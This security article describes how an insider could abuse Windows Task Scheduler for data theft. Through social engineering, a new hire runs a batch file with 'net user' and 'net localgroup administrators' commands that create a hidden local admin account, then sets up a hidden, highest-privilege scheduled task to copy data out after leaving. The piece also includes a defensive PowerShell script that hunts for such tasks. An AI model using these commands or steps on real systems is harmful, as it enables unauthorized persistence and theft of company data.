The Hidden Dangers of Microsoft’s Task Scheduler
by Gilbert Oviedo
Most Windows users run their computers daily, and while they may take steps to protect themselves, a hidden danger lurks in the form of the "Task Scheduler".
The Task Scheduler is a Microsoft component that automates tasks for Windows based on a variety of needs or triggers. It is also commonly used as a software updater by pesky applications such as Google, Adobe and a few others.
Most savvy users and malware programs peruse the Startup folder and even the Registry keys related to the computer startup process, yet ignore the seldom-used Task Scheduler.
The following information will describe a possible scenario in which a user’s computer can be used to steal data from the user or from the company the user works for. The data of value can be as simple as “Contact Lists, Current Projects, or Financial Status”. To a competitor, having that kind of knowledge is crucial.
This tutorial is only intended for educational purposes and not to be used in any way to commit digital cyber crimes.
The Thief: This person can be a corporate spy, a disgruntled employee, a fellow competitor, basically anyone with intent to steal.
The Victim: This person is either the one whose data is stolen, or the one whose credentials are used to steal data from other areas within the company.
The Prize: Data stored on the target computer or on the company's network drives.
The New Hire
It is not uncommon for someone to pad their resume with abilities they do not possess in the hope of landing a job. In some cases a person can wing it using the mighty Google or YouTube. However, in some professions winging it is not an option: you either know the job at hand or you don't. Some companies may offer "On the Job Training", but most want you to hit the ground running and augment the team's capabilities.
The Social Engineering Attack
Bob is the new programmer for a lab in a medical hospital. Bob is the night-shift programmer who shares a computer with the day-shift programmer. A couple of weeks after Bob joins the lab, he calls the help desk, which is also staffed by the night-shift crew, and requests temporary administrative rights to his computer because he needs to install some software that requires them.
A charming social engineer will disguise his or her true intentions and distract even the most disciplined help-desk tech from what is about to occur.
So now the attacker inserts a USB flash drive, browses to a folder and executes a nondescript batch file named setup.cmd with elevated rights via Task Manager.
Launch “Task Manager”
Select “Show processes from all users”
Browse to the attack script and select "Create this task with administrative privileges"; no UAC prompt appears
Unbeknownst to the tech, the minimized batch file that just ran contained:
net user IIS_User !Qwerty! /add
net localgroup administrators IIS_User /add
install some normal-software.exe
The tech saw a command prompt flash by and then observed some innocuous program being installed. The attacker now has a local account with admin rights.
Once the targets have been identified, be they the victim's local files or network data, the attacker sets up the data collector and the outbound data process.
Setting up the Silent Partner
Using the account created earlier in the day, the attacker creates a hidden scheduled task with the Windows Task Scheduler.
Create a shortcut on the desktop that opens the task scheduler
Right-click on the shortcut, select “Run as a different user”
Type in the credentials of the silent partner account and click “OK”
Now you can create a task with the silent partner as the author
From the Actions pane, select “Create Task”
Give the task a familiar name like “User_Feed_Synchronization_local”
The following options are essential:
- Change the user to that of the local silent partner
- Select “Run whether user is logged on or not”
- Select “Run with highest privileges”
- Select “Hidden”
The attacker sets the “Trigger” date to occur a week after his intended last day of work.
The attacker's actions depend on the type and amount of data. In the "Actions" tab, the attacker may simply copy data to a remote location using basic commands.
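The account creation in the setup.cmd scenario and the "silent partner" task above leave a recognizable footprint on the host. The following PowerShell hunt is an added example, not part of the original article: it flags registered tasks that combine "Run whether user is logged on or not" (LogonType Password or S4U), "Run with highest privileges", "Hidden", and a principal that is a local member of Administrators, then pulls the Security events that corroborate the account and task creation. It assumes Windows 8/Server 2012 or later with PowerShell 5.1+ and an elevated prompt so that other users' tasks are visible.

```powershell
# Added example: hunt for scheduled tasks matching the "silent partner" profile.
# Assumes Windows 8/Server 2012+ (ScheduledTasks module), PowerShell 5.1+
# (Microsoft.PowerShell.LocalAccounts) and an elevated session.

# Local (non-domain) accounts that currently hold administrator rights.
$localAdmins = Get-LocalGroupMember -Group 'Administrators' |
    Where-Object { $_.PrincipalSource -eq 'Local' } |
    ForEach-Object { ($_.Name -split '\\')[-1] }

# Built-in principals that legitimately run hidden, highest-privilege tasks.
$builtin = @('SYSTEM', 'LOCAL SERVICE', 'NETWORK SERVICE', 'S-1-5-18', 'S-1-5-19', 'S-1-5-20')

$findings = Get-ScheduledTask | ForEach-Object {
    $task      = $_
    $principal = $task.Principal
    $runsAs    = if ($principal.UserId) { ($principal.UserId -split '\\')[-1] } else { '' }

    # "Run whether user is logged on or not" registers as LogonType Password or S4U.
    $runsLoggedOff = "$($principal.LogonType)" -in @('Password', 'S4U')
    $highest       = "$($principal.RunLevel)" -eq 'Highest'
    $hidden        = [bool]$task.Settings.Hidden
    $localAdmin    = ($runsAs -ne '') -and ($localAdmins -contains $runsAs) -and ($builtin -notcontains $runsAs)

    # Three of four traits is the threshold used here; tune it for your estate.
    $score = @(@($runsLoggedOff, $highest, $hidden, $localAdmin) | Where-Object { $_ }).Count
    if ($score -ge 3) {
        [pscustomobject]@{
            Task      = "$($task.TaskPath)$($task.TaskName)"
            Author    = $task.Author
            RunsAs    = $principal.UserId
            LogonType = $principal.LogonType
            RunLevel  = $principal.RunLevel
            Hidden    = $hidden
            Command   = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
        }
    }
}

$findings | Format-Table -AutoSize

# Corroborate with the Security log: 4720 (user account created), 4732 (member added
# to a local group), 4698 (scheduled task created; requires "Audit Other Object
# Access Events" to be enabled). Review these around the date the account was created.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732, 4698 } -MaxEvents 100 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, @{ n = 'Summary'; e = { ($_.Message -split "`n")[0] } } |
    Format-Table -AutoSize
```

A task that shows up here is not automatically malicious; compare its Author and Command against the software the machine is supposed to run, and treat a local account that nobody recognizes as the stronger signal.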
In this scenario, the attacker gained access to a target company, set up a little silent partner, quit the company and waited to see if his little helper yielded fruit.
As people sometimes say, "Your Mileage May Vary": the results will vary with the capabilities and intent of the attacker and the security countermeasures established by the target's administrators. It is also noteworthy that in some cases the local culture influences how much security is observed or respected. In such environments you will always have users with rogue computers and bad computing practices.
It is quite possible that some corporate computers out there are sending out data overtly right now, through programs designed to streamline Windows processes that also let someone insert tasks masquerading as maintenance routines.
Author: Gilbert Oviedo
- IT professional since 1998
- Have managed Novell, Microsoft, Linux, and Mac servers.
- Security focus in virus footprinting
- Knowledgeable in PowerShell, AutoIt, .NET, VBScript, and Basic
- Words I live by: "If you have a hard time explaining it, then it is a bad idea." "Perception is our enabler, but it is also our limiting factor; if we cannot perceive it, we cannot build it." - Without Wax